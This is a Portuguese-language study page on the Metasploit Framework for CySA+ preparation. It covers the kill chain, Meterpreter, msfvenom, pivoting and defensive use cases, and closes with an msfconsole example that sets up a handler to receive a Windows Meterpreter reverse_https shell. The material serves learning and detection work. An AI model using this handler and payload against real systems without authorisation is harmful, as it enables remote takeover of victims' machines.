Metasploit Framework

Rapid7

Framework de pentest e exploração mais utilizado do mundo.

Gestão de Vulnerabilidades Freemium Plataforma / Suíte Em Estudo Cross-platform

Cyber Kill Chain e Ciclo do Defensor

Atacante — Kill Chain
1 Reconhecimento
2 Armamento
3 Entrega
4 Exploração
5 Instalação
6 Comando e Controle
7 Ações sobre Objetivos
Defensor — Ciclo de RI
8 Detecção / Monitoramento
9 Contenção e Erradicação
10 Forense Pós-Incidente

Descrição

O Metasploit Framework é o principal framework de exploração open-source. Mesmo que o CySA+ seja defensivo, é preciso entender o Metasploit porque é a ferramenta canônica do atacante e seus módulos movem grande parte das assinaturas de detecção.

Conceitos:

  • Exploits vs payloads vs encoders vs auxiliaries vs módulos post.
  • Meterpreter — agente in-memory pós-exploração.
  • msfvenom — gerador de payload (PE, ELF, JSP, ASPX, shellcode).
  • db_nmap — importa Nmap no workspace.
  • Pivoting e roteamento via hosts comprometidos.

Casos de uso

  • Validar se uma vulnerabilidade descoberta é realmente explorável
  • Gerar payloads ricos em IOCs para engenharia de detecção (purple)
  • Reconhecer tráfego de staging do Meterpreter em PCAP
  • Exercícios autorizados de red team interno

Exemplo

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.5
set LPORT 443
run -j